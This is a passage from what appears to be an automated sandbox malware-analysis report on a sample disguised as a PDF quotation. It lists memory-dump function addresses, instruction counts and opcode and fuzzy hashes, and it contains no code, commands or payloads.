Instruction Fuzzy Hash: A981E620B09A0A4FE7689B5984A47B577D1FF59304F5140BDD4CEC32E3DE78D9828740

Function 00007FFD9BA04B54 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee2f8ad573b849781b82968ede13d86bbdd2024caaed22469154b39004fae92
Instruction ID: c1e8cf0304220b240c98a73021c9a8fa7fd06d557c6d638f27252de1cdb3ac02
Opcode Fuzzy Hash: 3ee2f8ad573b849781b82968ede13d86bbdd2024caaed22469154b39004fae92
Instruction Fuzzy Hash: 5671C420B09A0A4FE7A89B6D84A47B977D1FF49304F5141BDD4CEC32E3DE68E9868340

Function 00007FFD9BA04C7F Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 770d711659b0620377d806ad75d3efff39abb30666aa083d394a52daef976eae
Instruction ID: 61acc11c3035d1b792cc9b177ec93f62600b7e946d0d6a5febf41da83efc399d
Opcode Fuzzy Hash: 770d711659b0620377d806ad75d3efff39abb30666aa083d394a52daef976eae
Instruction Fuzzy Hash: 2271C220B09A094FE7A89B5980A47B977E1FF59304F5140BDD8CEC72E3DE78E9868340

Function 00007FFD9BA04C9D Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b238a00f1a08d56ef0e854c868bfe5f44baad9b32346af1e64dd6731d97fe51
Instruction ID: 109b2bd2eedf0aa6795997df90bc8567f273b910d1614a7de9925f02bb7da060
Opcode Fuzzy Hash: 5b238a00f1a08d56ef0e854c868bfe5f44baad9b32346af1e64dd6731d97fe51
Instruction Fuzzy Hash: 5C71C520709A0A4FE7689B5D84647B977D1FF59304F5140BDD4CEC32E3DE78A9864340

Function 00007FFD9BA00E95 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f06e5ab07e03ceceb20399a58f23d93a8fe7bc10b44475cefac7adc2a9098ce9
Instruction ID: 420535b17d76dc886ca14c013b3197d0a48d062462b417db1e1acb394ceb5231
Opcode Fuzzy Hash: f06e5ab07e03ceceb20399a58f23d93a8fe7bc10b44475cefac7adc2a9098ce9
Instruction Fuzzy Hash: 1981C570A19A4D8FDBA4EF28D465BE977E1FF5A304F5540A8D08DD72A2DA31EC81CB40

Function 00007FFD9B8040FD Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2722e84fc2771ae4cf23c13ca77a167e3e8043e307ccb006ac30214f92b6f58
Instruction ID: fc5b02906fb98616782e7a92e92591eba501e9e65d2631fb814399ed33c9d913
Opcode Fuzzy Hash: f2722e84fc2771ae4cf23c13ca77a167e3e8043e307ccb006ac30214f92b6f58
Instruction Fuzzy Hash: 94610131A0975C4FEB55DF9CC8565ED7BF0EF99320F0881AAD48D87192CA346845CB82

Function 00007FFD9BA101DA Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb6fd1baaea2c315d4ef3a04958ee3aac660e0a9d807983755e6faf836148ee5
Instruction ID: 85eb0d08dbdf7c25057b5be310ba32ed8e758a54889598e3f6e917fe7be7a1e5
Opcode Fuzzy Hash: eb6fd1baaea2c315d4ef3a04958ee3aac660e0a9d807983755e6faf836148ee5
Instruction Fuzzy Hash: 2C61AF31B1EA5D4FDBF4DB288861BA877E1EF99710F0141BAD04DD32A2CE74AE458B44

Function 00007FFD9BA00F39 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e09c0da679e9ea1d43d250f90d8f8125f6fd525c0d7f1d283f019964bb918ba
Instruction ID: 6e868c2a17e0fbbe14ff945e054cd784ef5e7225bca59549f768e50eeff67588
Opcode Fuzzy Hash: 1e09c0da679e9ea1d43d250f90d8f8125f6fd525c0d7f1d283f019964bb918ba
Instruction Fuzzy Hash: 5261C370A19A4D8FDBA4EF28D465BE977E1FF5A304F5540A8D08CDB2A2DA35EC41CB00

Function 00007FFD9BA01824 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7b68832570d02444f34e3cb729ac9ff0ac09dbc816b93a568b0188f3614fb23
Instruction ID: 3199f414a1323aeab41e0597d6116179d3af2ec288efad920c823b4e41c6340a
Opcode Fuzzy Hash: e7b68832570d02444f34e3cb729ac9ff0ac09dbc816b93a568b0188f3614fb23
Instruction Fuzzy Hash: 44517E70B19A4D8FEBA8DF5884947B977E1FF6A301F1501BAD44ED72A2DE34AD418B00

Function 00007FFD9BA09D25 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 038dc8214ef3101a66c64a3d93bcb54ad7ec458a49f34c9166b4bcc258af02a0
Instruction ID: f2fe5971d38d17e0c695cea8a8584667e8892bd5d677a80c73eeb7037084ace6
Opcode Fuzzy Hash: 038dc8214ef3101a66c64a3d93bcb54ad7ec458a49f34c9166b4bcc258af02a0
Instruction Fuzzy Hash: 77513831B0EA4D0FEBB59B6D48692A977D1EF9A310F0502BAD0CDC71E2DD645D058780

Function 00007FFD9BA09529 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 381390c250a4a0f14d01752ccb24d669736b9185e811b22e03859d3d2ecbd467
Instruction ID: 566314527f34c63298c4c6777837b5427d71300d0ce08edd8e0d18d52361d59d
Opcode Fuzzy Hash: 381390c250a4a0f14d01752ccb24d669736b9185e811b22e03859d3d2ecbd467
Instruction Fuzzy Hash: F6511430A2DF8A4FD369DB5984A5AAAB3E0FF95300F4145BDD48EC3196DE74F8018782

Function 00007FFD9BA04F50 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eda97a60f747527042a609d9a64c73c6a7f411c299652d595f40da22b769ab8
Instruction ID: 6fda43a8849c4cc0c484297d706d2c17b6644a24d84be56fa88c8433045d935e
Opcode Fuzzy Hash: 3eda97a60f747527042a609d9a64c73c6a7f411c299652d595f40da22b769ab8
Instruction Fuzzy Hash: EF51D220B09A094FE7AC9B5980A5379B6D2FF98304F61417DE9CFC76E3CD68AD864244

Function 00007FFD9BA0EC70 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9d5bb015b82a2d7cb0b0c29f6dcff5f7c0d889c1b7b1d8c9ac06a699c1c85c4
Instruction ID: 965c1ecbaaca0b8730cab2db34cb0de5380f32a6430df81b8825a125f4569a3c
Opcode Fuzzy Hash: f9d5bb015b82a2d7cb0b0c29f6dcff5f7c0d889c1b7b1d8c9ac06a699c1c85c4
Instruction Fuzzy Hash: DC514D71A0EB894FD779DB2C88166A53BE0FF47301F1505BEC4CDC71B2DA64A9068381

Function 00007FFD9BA090C8 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: becaef18a28661e439e592a73509727acf2cf6812fa887fc1fe4139e6ac9e47c
Instruction ID: ac168435d2bfbd2de64face9a75f9c857e85d395764b6132b52a65c7845bda68
Opcode Fuzzy Hash: becaef18a28661e439e592a73509727acf2cf6812fa887fc1fe4139e6ac9e47c
Instruction Fuzzy Hash: B241A731B09D1C4FDBA4EB9CD4596ADB7E2EF9D310F0501AAE04DD33A6CE65AC018780

Function 00007FFD9B80258D Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd6ab8f86014de74806a92a316fc37f96d23b49ad09dd893d27ace8998b31ab
Instruction ID: bdf47594c5c33ff49c2d96a91a02c30e74a1dac0984b0e0e88f7c660ae3ec29d
Opcode Fuzzy Hash: 4fd6ab8f86014de74806a92a316fc37f96d23b49ad09dd893d27ace8998b31ab
Instruction Fuzzy Hash: 0651F57190D7C94FE7529F6898616E67FF1FF4A310F0A01FBD089CB1A3DA2859448782

Function 00007FFD9BA0DC8A Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 052b2f2bb6e303ba7aa1b5caaf525c2dc1204179d9e20d527220e3b95d3a4652
Instruction ID: 77367650d12c3fe08f9ce24d56351f4b988e91ac4bb2def06c89a72da9e8e5d6
Opcode Fuzzy Hash: 052b2f2bb6e303ba7aa1b5caaf525c2dc1204179d9e20d527220e3b95d3a4652
Instruction Fuzzy Hash: 7451673160EBC54FC752DB789865AA17FF0EF47210B0900EAC4CACB2A7DD68680AC701

Function 00007FFD9BA0ECB1 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ece8d3320567621ca7f0addff55e8996bc378a0b13cc1b9a5025b10723e82f
Instruction ID: f25ce1212c35411531d4066a5c10aba0ad4c39374e7399a68f946a1d9cce4253
Opcode Fuzzy Hash: 69ece8d3320567621ca7f0addff55e8996bc378a0b13cc1b9a5025b10723e82f
Instruction Fuzzy Hash: 6351FA71E1EB894FE779D768882B5A43BE0EF57300F1505BAC4CDC71B3DA68A90A9341

Function 00007FFD9B804AFA Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87aa49501f47d211925e260e950f864a63e9d4b98ea38913b9316684abe1192
Instruction ID: 87dd84e43c15f9654e722e3c2dff6d521db59510ad6653b97f1822504753a393
Opcode Fuzzy Hash: d87aa49501f47d211925e260e950f864a63e9d4b98ea38913b9316684abe1192
Instruction Fuzzy Hash: 3941D82BE0E1A60EE705B77CB5F68E93B60DF8222E71983F7D45D8E0E7DC1810498655

Function 00007FFD9BA0DCD7 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36daec727c96f5e7b4181d45122bd8f78dc1cb47758fd118047604084f52677d
Instruction ID: 1dab17f5234bd6519db602b21697f23a5862d267da6302c581cd0f09e681758a
Opcode Fuzzy Hash: 36daec727c96f5e7b4181d45122bd8f78dc1cb47758fd118047604084f52677d
Instruction Fuzzy Hash: FA41232160EBC50FD7569B388865AA47FF0EF57210B0940EBD489CB1A7DD68AC0AC751

Function 00007FFD9BA18803 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fcd742a790d9749ad70ada110ffb6a608c9f847fdc62990e3c878a7101975e0
Instruction ID: 228c69542ac92e7ec064dbd5931ad78f5faea6fa01f89af377b1e595fac152fb
Opcode Fuzzy Hash: 5fcd742a790d9749ad70ada110ffb6a608c9f847fdc62990e3c878a7101975e0
Instruction Fuzzy Hash: 40412A31A1EA8A4FE7B99B7844712B53BE1EF15350F1900BEC08AC75E3DE69B942C341

Function 00007FFD9BA0387E Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d1ff7569e7bc4fd024324e6890e46b08003ae7a71c14365242682d61513792e
Instruction ID: 3bf751e11c59428a6b91595211c339b40d5111375ac53cd388f76bfc0be340e1
Opcode Fuzzy Hash: 7d1ff7569e7bc4fd024324e6890e46b08003ae7a71c14365242682d61513792e
Instruction Fuzzy Hash: EF41D57060D64C4FDB689B1C94656B97BE1FF9A310F1501AFE4C9D32A2CA75E842C741

Function 00007FFD9BA0DE19 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae7fa6d54ecb34132119ff43e3798118d6a8396e1eda49c42450db970c1279f
Instruction ID: fffa87ac7ddd4825e402aeabc3c0c028749a82dae9a08a4dff9a8acc8488b6bc
Opcode Fuzzy Hash: cae7fa6d54ecb34132119ff43e3798118d6a8396e1eda49c42450db970c1279f
Instruction Fuzzy Hash: 1331E822B0EA4D4FE6A5875D487467437D1EFA6715F0640BAE8CDC71F3DD84AD068341

Function 00007FFD9BA0D63D Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75630b92a997507384ffb99960dc3a67b5e9f943ce1deeb62472321f91d720b0
Instruction ID: 149d10f5fb1a77b676d58c1769b4dda878485eca37103d84d2761f328419cdf8
Opcode Fuzzy Hash: 75630b92a997507384ffb99960dc3a67b5e9f943ce1deeb62472321f91d720b0
Instruction Fuzzy Hash: A1315C2270E7891FE765976C986A6B53BD0EF97254F0901BBD8CCC70A3ED557D028342

Function 00007FFD9BA0BFE1 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff6601c71cca764781643d8da2bcb9effa1cd122a3aee8ecd69f90b346c3a1a
Instruction ID: 2bbca898e7990a95b43293560fb5f4e679d18bcf35ef266dd25ca46bc74d1801
Opcode Fuzzy Hash: 6ff6601c71cca764781643d8da2bcb9effa1cd122a3aee8ecd69f90b346c3a1a
Instruction Fuzzy Hash: 92418D31A0EBC64FD326AB6894659E67BE0EF42214B1501FBD0C9CB0E7DE2CA549C341

Function 00007FFD9BA103B5 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7524cfa6989a82170ddd05db04b855e66bff91079d3f746f9b722df353ad0262
Instruction ID: 76b137c3acf0e4a8ed3cca75d50cb81c27475999137c0cba0ee2ad3a9cc4cfa3
Opcode Fuzzy Hash: 7524cfa6989a82170ddd05db04b855e66bff91079d3f746f9b722df353ad0262
Instruction Fuzzy Hash: C7412C30B1D91D8FDFE4EB58C8A1B6877A1EF99710F5181A8D04DD32A2CE75AE46CB40

Function 00007FFD9B802C32 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5b98b384aeabe9924769e868f35b7a2f490d56df8b4a1becb0d82eba585210
Instruction ID: 71629fab6508e96cd913a91924da14b8cbff5bc9c59875d70b60fa8b2e37a7d7
Opcode Fuzzy Hash: 5f5b98b384aeabe9924769e868f35b7a2f490d56df8b4a1becb0d82eba585210
Instruction Fuzzy Hash: 2F41D430B0A64E4FE7A49FF854753B87692EF5A340F1600BAD48ECB2E7CDA86D418340

Function 00007FFD9BA0E341 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49df20e2c5984a1126cde986bf1da57355cecf830dc846bafca3b33516bceffa
Instruction ID: d126abe300325a46c78c39b911e43018a9c6211b248ea9f02cb10f7a97e81465
Opcode Fuzzy Hash: 49df20e2c5984a1126cde986bf1da57355cecf830dc846bafca3b33516bceffa
Instruction Fuzzy Hash: AE31F131E0E90D4FE7B4DB1CD46A6A437D0EF5A310F1205BAE1CDC72B1EA66AD069781

Function 00007FFD9B802899 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a50e53893ce7c2f80c2ae7f1c1905dfb8134279f95586707f52bbe43206034
Instruction ID: af1e2861d0e9939fe2992e8dfcfba0283c2dd043f91374abcdfe25684e96da3c
Opcode Fuzzy Hash: f0a50e53893ce7c2f80c2ae7f1c1905dfb8134279f95586707f52bbe43206034
Instruction Fuzzy Hash: D0411671A1E6C90FE3A19FB84864AA57BE1EF5A640B4A00FBD4C8CB2B7DD149D048341

Function 00007FFD9BA1313C Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c1e8dd10f2dcef196ba5ab6d18cbaf280a8d6c72568e9b77b66be860ad9d65a
Instruction ID: 5c0b2d2193c5e6657d5fcc26923b31da18f50b27ae6c8cad2d58d2aac4fa68a9
Opcode Fuzzy Hash: 2c1e8dd10f2dcef196ba5ab6d18cbaf280a8d6c72568e9b77b66be860ad9d65a
Instruction Fuzzy Hash: 6131A03071DA4C4FD794EB6CC4A462977E1EF99300F4401AEF08EC32A2CE64ED418782

Function 00007FFD9BA018DA Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26c1cd9e76a088be618e2817b3c70b4e0bc062592899aacc625a6d35e6ecaafb
Instruction ID: 0210cb32d7763c45567d18819063dbcb4d29389bad36688639b0ed38117207bc
Opcode Fuzzy Hash: 26c1cd9e76a088be618e2817b3c70b4e0bc062592899aacc625a6d35e6ecaafb
Instruction Fuzzy Hash: B0412C70B14A0D8FEBA8EF58C498BA877E1FF6A305F5141A9D44ED7261DF34AD418B00

Function 00007FFD9B806390 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d4ffa8fc13043be27d9e411fcd83738e68f3676ea94f5c4c444f61383f9309
Instruction ID: 8148d92c854b5e54d3e4a26a2ec3e14d5e008a13566b5be48202851d590a3939
Opcode Fuzzy Hash: 00d4ffa8fc13043be27d9e411fcd83738e68f3676ea94f5c4c444f61383f9309
Instruction Fuzzy Hash: 6D41D2B0A19A4D8FDB64EFA8D455AEDBBF0FF58344F10017AD04DEB265DA34A941CB80

Function 00007FFD9BA0F992 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d28b3a5aa88fc53877388d81913dd2615f13de7f4e4c64bdc1a9d24cc8144e0
Instruction ID: e0c3ab0ea99422a031c7012e148aa97a04116725f69972a6f0ed6299d0ea5cf6
Opcode Fuzzy Hash: 7d28b3a5aa88fc53877388d81913dd2615f13de7f4e4c64bdc1a9d24cc8144e0
Instruction Fuzzy Hash: 5031182171E9894FE7A8EB7C8479B753BD1EF5A314F0900BAD08DC72A3CD55A942C740

Function 00007FFD9B80CDD3 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38f8b8a84a9791dbfbe01e528761693047686c51550ab3dc9525fc92ddb8611
Instruction ID: aae301cd76c00820b51600a4986f04722d6b942bc8cdbdc82322ec56d3d00de2
Opcode Fuzzy Hash: e38f8b8a84a9791dbfbe01e528761693047686c51550ab3dc9525fc92ddb8611
Instruction Fuzzy Hash: 8F310B36D0E2895FDB02EF6CD8A55E93BB0EF46329B0941F3D09DCA1A3DD246448C791

Function 00007FFD9BA11555 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc083bcce0a62aff1f63264b6553917c49cfc6a247ceb10cd00493a75f8b779
Instruction ID: da7c23689bc562dbfa5772151d570195a91498d5496483b6d3d19d637af1c66d
Opcode Fuzzy Hash: 6dc083bcce0a62aff1f63264b6553917c49cfc6a247ceb10cd00493a75f8b779
Instruction Fuzzy Hash: F931E43070DA8D4FD7D5EB6C94A4A757BE1EF9A310F4501BAE08EC72A2CE69DC428741

Function 00007FFD9BA07C80 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb9fc88f763a5df87577bfa1f4a0e4773f63ba99a17b5e68e8930310f8137484
Instruction ID: dc43c3b0a00abd3a2479a648d0f84640bc4779c55de226aa47d2ea935ce5f2e3
